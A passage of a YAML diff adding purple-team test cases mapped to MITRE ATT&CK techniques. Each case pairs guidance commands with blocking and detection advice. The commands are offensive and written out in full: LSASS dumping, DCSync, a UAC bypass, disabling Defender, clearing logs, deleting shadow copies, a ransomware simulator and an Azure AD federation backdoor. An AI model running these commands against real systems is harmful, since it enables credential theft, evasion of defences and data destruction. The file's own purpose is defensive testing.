+ platforms: + guidance: + block: + - Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint + detect: + - Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour). + controls: + - IdP + metadata: + id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7 + tid: T1621 + tactic: TA0006 + x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7 + isv: 1 +- name: External employee portal spray + description: Perform a password spray against an external employee login portal using a list of potential users and a single password + platforms: + guidance: + - Burp -> intruder + block: + - Portal protected with secure MFA solution + - IdP blocks bulk automated requests + detect: + - Detect a large number of authentication attempts originating from a single source in a short period of time using authentication logs + - Web application logs are ingested into the SIEM and alerts triggered for suspicious activity (e.g. brute force attacks, large number of 400/500 status codes) + controls: + - IdP + - SIEM + metadata: + id: 44fd7250-e613-441f-9cb6-5b98c2d71338 + tid: T1110.003 + tactic: TA0006 + x_vectr_id: 44fd7250-e613-441f-9cb6-5b98c2d71338 + isv: 1 +- name: Suspicious external employee login + description: Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt. 
+ platforms: + guidance: + block: + - Suspicious logins originating from select geolocations are blocked + detect: + - Baseline login events for users using authentication logs then generate alerts for instances where the logins occur from comparatively anomalous geolocations + controls: + - SIEM + - IdP + metadata: + id: 609515fe-24e0-4bc2-a069-a3d815e68ec2 + tid: T1078 + tactic: TA0001 + x_vectr_id: 609515fe-24e0-4bc2-a069-a3d815e68ec2 + isv: 1 +- name: Suspicious service use + description: Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service. + platforms: + guidance: + block: + - '' + detect: + - Baseline application use for users using application logs then generate alerts for instances where the usage occurs from comparatively anomalous geolocations + controls: + - SIEM + metadata: + id: 1f9d5363-ddf4-41c3-8bc3-f80595219206 + tid: T1078 + tactic: TA0001 + x_vectr_id: 1f9d5363-ddf4-41c3-8bc3-f80595219206 + isv: 1 +Defense Evasion: +- name: Clear Windows Event Log entries + description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs. 
+ platforms: + - windows + guidance: + - CMD> wevtutil clear-log Security + - CMD> wevtutil clear-log Application + - CMD> wevtutil clear-log System + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102) + controls: + - Endpoint Protection + - SIEM + metadata: + id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1 + tid: T1070.001 + tactic: TA0005 + x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1 + isv: 1 +- name: Load known-abusable kernel driver + description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes. + platforms: + - windows + guidance: + - "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n" + block: + - Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics. 
+ - https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules + - https://www.loldrivers.io/ + - Anomalous driver load blocked by endpoint security tool + detect: + - Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6 + controls: + - Hardening + - Endpoint Protection + metadata: + id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0 + tid: T1014 + tactic: TA0005 + x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0 + isv: 1 +- name: DLL execution using Rundll32 + description: Execute a malicious DLL's function directly using rundll32 + platforms: + - windows + guidance: + - cmd> rundll32 {{ dll }},{{ export }} [{{ args }}] + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Payload on disk deleted/quarantined by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + controls: + - Endpoint Protection + - SIEM + metadata: + id: 940be4b6-6081-4808-ab64-aceadfeb3792 + tid: T1218.011 + tactic: TA0005 + x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792 + isv: 1 +- name: Bypass User Account Control (UAC) via fodhelper + description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification + platforms: + - windows + guidance: + - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f + - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f + - cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f + - cmd> c:\windows\system32\fodhelper.exe + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Suspicious Windows 
Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs) + controls: + - SIEM + - Endpoint Protection + metadata: + id: 8c06191e-8c03-4b97-8c18-e28cde39fda5 + tid: T1548.002 + tactic: TA0004 + x_references: + - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/ + x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5 + isv: 1 +- name: Sideload a DLL into a legitimate application + description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application. + platforms: + - windows + guidance: + - "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder) + controls: + - Endpoint Protection + - SIEM + metadata: + id: 2496e250-5757-482f-9661-daea872395ae + tid: T1574.002 + tactic: TA0005 + x_vectr_id: 2496e250-5757-482f-9661-daea872395ae + isv: 1 +- name: Disable Windows Defender via PowerShell + description: Use PowerShell's Set-MpPreference to disable Windows Defender + platforms: + - windows + guidance: + - PS> Set-MpPreference -DisableBehaviorMonitoring $true + - PS> Set-MpPreference -DisableRealtimeMonitoring $true + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - "Changes to Defender's running state are detected using Defender Event Log events (e.g. 
5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)" + controls: + - Endpoint Protection + metadata: + id: cb3ea139-979c-438a-9cf7-611b985f4d61 + tid: T1562.001 + tactic: TA0005 + x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61 + isv: 1 +- name: Modify identity policy in IdP + description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement. + platforms: + guidance: + block: + - '' + detect: + - Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes + controls: + - SIEM + metadata: + id: cbd9070f-03fa-455f-af46-99e8d41146ac + tid: T1484 + tactic: TA0003 + x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac + isv: 1 +Discovery: +- name: Domain Controller discovery via nltest + description: Use nltest.exe to identify domain controllers in the domain + platforms: + - windows + guidance: + - cmd> nltest.exe /dclist:{{ domain }} + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible. 
+ controls: + - Endpoint Protection + - SIEM + metadata: + id: bc85f11b-e481-4afb-a5f5-db26e5c07433 + tid: T1018 + tactic: TA0007 + x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433 + isv: 1 +- name: Domain trust discovery via nltest + description: Identify domain trust relationships using nltest.exe + platforms: + - windows + guidance: + - cmd> nltest.exe /domain_trusts /all_trusts + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible. + controls: + - Endpoint Protection + - SIEM + metadata: + id: 4266c26e-0470-4b97-8dc3-1d24fe35f586 + tid: T1482 + tactic: TA0007 + x_vectr_id: 4266c26e-0470-4b97-8dc3-1d24fe35f586 + isv: 1 +- name: Enumerate domain groups and users using net + description: Enumerate domain users and domain groups using the builtin net.exe + platforms: + - windows + guidance: + - cmd> net user /domain + - cmd> net group /domain + - cmd> net group "Domain Admins" /domain + - cmd> net group "Domain Computers" /domain + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible. 
+ controls: + - Endpoint Protection + - SIEM + metadata: + id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2 + tid: T1087.002 + tactic: TA0007 + x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2 + isv: 1 +- name: BloodHound DC enumeration + description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller + platforms: + guidance: + - cmd> SharpHound.exe -c DcOnly + block: + - '' + detect: + - Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools + - Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663) + - https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance + controls: + - SIEM + - Identity Threat Protection + metadata: + id: 672f8861-c914-4f58-b861-5107ce19f61c + tid: T1087.002 + tactic: TA0007 + x_tools: + - https://github.com/BloodHoundAD/SharpHound + x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c + isv: 1 +- name: Internal network scan using Net Scan + description: Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect + platforms: + - windows + guidance: + - cmd> {{ netscan_binary }} + block: + - Network security controls block source generating a large volume of connection requests + - Block the installation and use of unapproved third-party utilities via application control software + detect: + - Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs + controls: + - ID/PS + - Firewall + - SIEM + - Application Control + metadata: + id: 3f120c23-78c0-462f-808f-38ef4f607233 + tid: T1046 + 
tactic: TA0007 + x_tools: + - https://www.softperfect.com/products/networkscanner/ + x_vectr_id: 3f120c23-78c0-462f-808f-38ef4f607233 + isv: 1 +- name: Retrieve system information + description: Retrieve information about the system using multiple builtin commands + platforms: + - windows + guidance: + - CMD> systeminfo ipconfig tasklist sc query wmic product get + block: + - '' + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + controls: + - Endpoint Protection + - SIEM + metadata: + id: 9064e91a-be78-48a5-9112-28d5701d6d51 + tid: T1082 + tactic: TA0007 + x_vectr_id: 9064e91a-be78-48a5-9112-28d5701d6d51 + isv: 1 +Command and Control: +- name: HTTP C2 over tcp/80 + description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP + platforms: + guidance: + block: + - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool + detect: + - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool + controls: + - Firewall + - ID/PS + - Web Gateway + metadata: + id: 38064494-0d58-4f48-bce8-b5b7ea7db3da + tid: T1071.001 + tactic: TA0011 + x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da + isv: 1 +- name: HTTPS C2 over tcp/443 + description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS + platforms: + guidance: + block: + - C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool + detect: + - C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool + controls: + - Firewall + - ID/PS + - Web Gateway + metadata: + id: 3ed2f449-744b-48c3-80d2-854386e446a0 + tid: T1071.001 + tactic: TA0011 + x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0 + isv: 1 +- name: Access via remote assistance tool + description: Establish connection to system using a legitimate remote assistance 
application + platforms: + guidance: + block: + - Block the installation and use of unapproved third-party utilities via application control software + - Connections to known remote access service domains/IPs are blocked + - Remote access connection attempts originating from users outside of the tenant are blocked + detect: + - Connections to known remote access service domains/IPs are detected + controls: + - Application Control + - ID/PS + - Firewall + metadata: + id: 10f6c44e-b862-4553-bc55-68f6d941bcfb + tid: T1219 + tactic: TA0011 + x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb + isv: 1 +- name: Remote tool download over HTTP + description: Download a tool from a public hosting location onto the victim system + platforms: + guidance: + block: + - Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS + detect: + - Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS + controls: + - Firewall + - ID/PS + - Web Gateway + metadata: + id: 9755cd8b-5212-4331-8c6e-afb27404a4b9 + tid: T1105 + tactic: TA0011 + x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9 + isv: 1 +- name: C2 over Dropbox + description: Establish a command-and-control connection from a managed asset to an external server on the Internet by tunneling the traffic through Dropbox. This will masquerade the command-and-control traffic as legitimate application traffic. 
+ platforms: + guidance: + block: + - C2 channel using legitimate service is blocked by proxy, firewall, or network behavioral/UEBA tool + - Connection to legitimate service that falls outside standard business operations blocked based on domain and/or domain categorization + detect: + - C2 channel using legitimate service is detected by proxy, firewall, or network behavioral/UEBA tool + controls: + - Firewall + - ID/PS + - Web Gateway + metadata: + id: 43ab96a9-b2c0-442a-b8e4-18e172a1a2ce + tid: T1102.002 + tactic: TA0011 + x_references: + - https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online + x_vectr_id: 43ab96a9-b2c0-442a-b8e4-18e172a1a2ce + isv: 1 +Credential Access: +- name: Extract Logonpasswords via Nanodump + description: Use nanodump to extract credentials from LSASS process memory + platforms: + - windows + guidance: + - cmd> nanodump.exe --duplicate -w {{ out_file }} + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Enable Credential Guard to prevent traditional process dumping of LSASS + detect: + - Suspicious process execution/behavior detected by endpoint security tool + controls: + - Endpoint Protection + - Hardening + metadata: + id: 8eeb3c12-dc2e-4791-aff5-e81501312886 + tid: T1003.001 + tactic: TA0006 + x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886 + isv: 1 +- name: Dump LSASS memory using builtin comsvcs.dll + description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk + platforms: + - windows + guidance: + - shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Enable Credential Guard to prevent traditional process dumping of LSASS + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + controls: + - SIEM + - 
Endpoint Protection + - Hardening + metadata: + id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8 + tid: T1003.001 + tactic: TA0006 + x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8 + isv: 1 +- name: Dump LSASS memory using Sysinternals ProcDump + description: Use ProcDump from Sysinternals to dump LSASS process memory + platforms: + - windows + guidance: + - CMD> procdump -ma lsass.exe dump + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Enable Credential Guard to prevent traditional process dumping of LSASS + - Block the installation and use of unapproved third-party utilities via application control software + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + controls: + - SIEM + - Endpoint Protection + - Hardening + - Application Control + metadata: + id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1 + tid: T1003.001 + tactic: TA0006 + x_tools: + - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump + x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1 + isv: 1 +- name: Volumetric Kerberoasting + description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set + platforms: + guidance: + - cmd> Rubeus.exe kerberoast + block: + - '' + detect: + - 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 
3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).' + controls: + - SIEM + - Identity Threat Protection + metadata: + id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7 + tid: T1558.003 + tactic: TA0006 + x_tools: + - https://github.com/GhostPack/Rubeus + x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7 + isv: 1 +- name: Extract browser cookies + description: Extract cookie information from the user's browser + platforms: + - windows + guidance: + - cmd> SharpChrome.exe cookies + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Suspicious access to database files used by browsers detected using file system telemetry in the SIEM + controls: + - Endpoint Protection + - SIEM + metadata: + id: 95790889-fb7d-42af-a221-3535e4197cde + tid: T1555.003 + tactic: TA0006 + x_tools: + - https://github.com/GhostPack/SharpDPAPI + x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde + isv: 1 +- name: Extract domain user credentials via replication + description: Replicate a user's hash from a domain controller using replication APIs (DCSync). + platforms: + - windows + guidance: + - (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }} + block: + - '' + detect: + - Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. 
either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}") + - https://blog.blacklanternsecurity.com/p/detecting-dcsync + controls: + - SIEM + - Identity Threat Protection + metadata: + id: d6dd145b-c7ae-4f79-bc07-179a012a7a07 + tid: T1003.006 + tactic: TA0006 + x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07 + isv: 1 +- name: Register Security Service Provider (SSP) in LSASS + description: Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS. + platforms: + - windows + guidance: + - shell> {{ ssp_loader }} + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Enable the LSA "RunAsPPL" protection to prevent the loading of untrusted DLLs by LSASS + detect: + - For SSPs registered permanently, detect modifications to the "Security Packages" key under HKLM\System\CurrentControlSet\Control\LSA\. Additionally look for DLL writes to System32. 
+ - For temporary SSP loads, detect anomalous module loads by LSASS.exe after establishing a basline for normal module loads + controls: + - Endpoint Protection + metadata: + id: 6efcb4c5-d740-41ce-a0dc-b63734813928 + tid: T1547.005 + tactic: TA0006 + x_references: + - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot + x_vectr_id: 6efcb4c5-d740-41ce-a0dc-b63734813928 + isv: 1 +- name: Enabled WDigest via Registry + description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory + platforms: + - windows + guidance: + - cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f + block: + - Suspicious Registry modification blocked by endpoint security tool + detect: + - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656). 
+ controls: + - Endpoint Protection + - SIEM + metadata: + id: 9a66066b-997b-4ff1-8b4b-c14d982df861 + tid: T1112 + tactic: TA0005 + x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861 + isv: 1 +Impact: +- name: Delete shadows with vssadmin.exe + description: Delete volume shadow copies on the host to inhibit file system recovery + platforms: + - windows + guidance: + - CMD> vssadmin.exe delete shadows /all /quiet + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Suspicious Volume Shadow Service use detected in the SIEM using telemetry + controls: + - Endpoint Protection + - SIEM + metadata: + id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4 + tid: T1490 + tactic: TA0040 + x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4 + isv: 1 +- name: Encrypt a large amount of files + description: Encrypt a large amount of files on the endpoint to simulate ransomware + platforms: + guidance: + - cmd> coldcryptor.exe run {{ extension }} + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Detect common ransomware extensions using file system telemetry + controls: + - Endpoint Protection + metadata: + id: 72224b97-93d1-4087-8b82-6b4342bf2e09 + tid: T1486 + tactic: TA0040 + x_tools: + - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor + x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09 + isv: 1 +- name: Modify group policy object + description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems. 
+ platforms: + guidance: + block: + - '' + detect: + - Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes + controls: + - SIEM + metadata: + id: 45591791-541b-4a27-bda9-75e6d78a66f4 + tid: T1484.001 + tactic: TA0005 + x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4 + isv: 1 +Lateral Movement: +- name: Lateral Movement via RDP + description: Perform an interactive logons to a Windows system via RDP + platforms: + - windows + guidance: + - CMD> mstsc /v:{{ target }} + block: + - Host-based firewalls prevent direct communications over common ports/protocols + detect: + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + controls: + - SIEM + - Identity Threat Protection + - Hardening + metadata: + id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61 + tid: T1021.001 + tactic: TA0008 + x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61 + isv: 1 +- name: Lateral Movement via PsExec + description: Move to another system by creating a service remotely via Sysinternals PsExec + platforms: + - windows + guidance: + - CMD> psexec -s \{{ target }} {{ command }} + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Host-based firewalls prevent direct communications over common ports/protocols + - Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote 
access activities for the initiating principal + controls: + - Endpoint Protection + - SIEM + - Identity Threat Protection + - Hardening + metadata: + id: 9b5396f2-6e4a-498a-995e-47e48a99bf76 + tid: T1021.002 + tactic: TA0008 + x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76 + isv: 1 +- name: Lateral Movement via WMI + description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system + platforms: + - windows + guidance: + - CMD> wmic /node:"{{ target }}" process call create "{{ command }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + - Host-based firewalls prevent direct communications over common ports/protocols + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal + controls: + - Endpoint Protection + - SIEM + - Identity Threat Protection + - Hardening + metadata: + id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79 + tid: T1021.003 + tactic: TA0008 + x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79 + isv: 1 +- name: Remote .exe copy + description: Copy an .exe payload to a temp folder on the remote target + platforms: + guidance: + - cmd> copy {{ exe }} \\{{ target }}\{{ share }}\{{ path }} + block: + - Host-based firewalls prevent direct communications over common ports/protocols + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating 
principal + controls: + - Endpoint Protection + - Antivirus + - SIEM + metadata: + id: b74ff4c5-eebf-466b-af85-341b19c4c748 + tid: T1570 + tactic: TA0008 + x_vectr_id: b74ff4c5-eebf-466b-af85-341b19c4c748 + isv: 1 +Persistence: +- name: Persist via new scheduled task + description: Persist on a system by creating a new scheduled task + platforms: + - windows + guidance: + - cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00 + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks. + controls: + - SIEM + - Endpoint Protection + metadata: + id: 20a6dace-d801-42f5-b659-6cf91e39d273 + tid: T1053.005 + tactic: TA0003 + x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273 + isv: 1 +- name: Persist via new Windows service + description: Persist on a system by creating a new service + platforms: + - windows + guidance: + - CMD> sc create {{ service_name }} binPath= "{{ command }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services. 
+ controls: + - SIEM + - Endpoint Protection + metadata: + id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737 + tid: T1543.003 + tactic: TA0003 + x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737 + isv: 1 +- name: Persist via Registry Winlogon Shell + description: Run a payload during user login by setting a Registry Winlogon key + platforms: + - windows + guidance: + - CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656). + controls: + - Endpoint Protection + - SIEM + metadata: + id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622 + tid: T1547.004 + tactic: TA0003 + x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622 + isv: 1 +- name: Register a new device in Azure AD + description: Register a new device in Azure AD + platforms: + - azuread + guidance: + - PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1" + block: + - 'Prevent users outside of approved groups from being able to register new devices in the tenant. 
Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings' + detect: + - Detect anomalous device registration events by using Azure audit logs + controls: + - SIEM + - Hardening + metadata: + id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96 + tid: T1098.005 + tactic: TA0003 + x_tools: + - AADInternals + x_references: + - htpts://aadinternals.nom/post/prt/ + x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96 + isv: 1 +- name: Configure a custom federated domain + description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant. + platforms: + - azuread + guidance: + - PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}" + block: + - '' + detect: + - Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated". + - https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html + controls: + - SIEM + metadata: + id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1 + tid: T1484.002 + tactic: TA0003 + x_tools: + - AADInternals + x_references: + - https://o365blog.com/post/aadbackdoor/ + x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1 + isv: 1 +Exfiltration: +- name: Extract sensitive data over HTTP + description: Extract data from the network over HTTP tcp/80 to an external host or IP. 
